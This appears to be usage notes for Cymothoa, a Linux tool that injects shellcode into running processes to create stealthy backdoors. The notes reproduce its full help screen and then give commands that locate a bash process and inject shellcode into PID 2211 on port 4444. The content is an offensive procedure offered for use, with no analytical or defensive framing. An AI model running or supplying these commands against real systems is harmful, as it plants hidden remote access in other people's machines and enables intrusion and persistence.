1                               _                 
 2                           _  | |                
 3   ____ _   _ ____   ___ _| |_| |__   ___  _____ 
 4  / ___) | | |    \ / _ (_   _)  _ \ / _ \(____ |
 5 ( (___| |_| | | | | |_| || |_| | | | |_| / ___ |
 6  \____)\__  |_|_|_|\___/  \__)_| |_|\___/\_____|
 7       (____/  
 8 Ver.1 (beta) - Runtime shellcode injection, for stealthy backdoors...
 9 
10 By codwizard (codwizard@gmail.com) and crossbower (crossbower@gmail.com)
11 from ES-Malaria by ElectronicSouls (http://www.0x4553.org).
12 
13 Usage:
14     cymothoa -p <pid> -s <shellcode_number> [options]
15 
16 Main options:
17     -p    process pid
18     -s    shellcode number
19     -l    memory region name for shellcode injection (default /lib/ld)
20           search for "r-xp" permissions, see /proc/pid/maps...
21     -m    memory region name for persistent memory (default /lib/ld)
22           search for "rw-p" permissions, see /proc/pid/maps...
23     -h    print this help screen
24     -S    list available shellcodes
25 
26 Injection options (overwrite payload flags):
27     -f    fork parent process
28     -F    don‘t fork parent process
29     -b    create payload thread (probably you need also -F)
30     -B    don‘t create payload thread
31     -w    pass persistent memory address
32     -W    don‘t pass persistent memory address
33     -a    use alarm scheduler
34     -A    don‘t use alarm scheduler
35     -t    use setitimer scheduler
36     -T    don‘t use setitimer scheduler
37 
38 Payload arguments:
39     -j    set timer (seconds)
40     -k    set timer (microseconds)
41     -x    set the IP
42     -y    set the port number
43     -r    set the port number 2
44     -z    set the username (4 bytes)
45     -o    set the password (8 bytes)
46     -c    set the script code (ex: "#!/bin/sh\nls; exit 0")
47           escape codes will not be interpreted...

tar -cf cymothoa.tar cymothoa/

tar xf  cymothoa.tar

ps a|grep /bin/bash

./cymothoa -s 0 -p 2211 -y 4444